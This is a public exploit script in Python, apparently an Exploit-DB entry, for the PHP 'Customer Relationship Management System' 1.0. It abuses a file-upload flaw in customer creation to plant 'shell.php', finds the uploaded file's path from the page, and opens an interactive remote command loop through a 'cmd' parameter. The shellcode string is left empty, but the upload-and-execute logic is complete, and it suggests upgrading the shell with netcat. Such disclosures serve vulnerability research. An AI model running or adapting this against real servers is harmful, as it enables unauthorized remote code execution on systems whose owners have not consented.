# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution # Date: 21.06.2021 # Exploit Author: Ishan Saha # Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip # Version: 1.x # Tested on: Ubuntu # REQUREMENTS # # run pip3 install requests colorama beautifulsoup4 # DESCRIPTION # # # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option # # Exploit Working: # # 1. Starting a session with the server # # 2. Registering a user hackerctf : hackerctf and adding payload in image # # 3. Finding the uploaded file location in the username image tag # # 4. Runing the payload file to give a shell #!/usr/bin/python3 import requests , time from bs4 import BeautifulSoup as bs from colorama import Fore, Back, Style # Variables : change the URL according to need URL="http://192.168.0.245/crm/" # CHANGE THIS shellcode = "" filename = "shell.php" content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"} authdata={"username":"hackerctf","password":"hackerctf"} def format_text(title,item): cr = '\r\n' section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr item=str(item) text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET return text ShellSession = requests.Session() response = ShellSession.post(URL+"classes/Users.php?f=create_customer",data=content_data ,files={"img":(filename,shellcode,"application/php")}) response = ShellSession.post(URL+"classes/Login.php?f=clogin",data=authdata) response = ShellSession.get(URL + "customer/") soup = bs(response.text,"html.parser") location= soup.find('img')['src'] #print statements print(format_text("Target",URL),end='') print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='') print(format_text("shell location",location),end='') print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!")) while True: cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET) if cmd == 'exit': break print(ShellSession.get(location + "?cmd="+cmd).content.decode())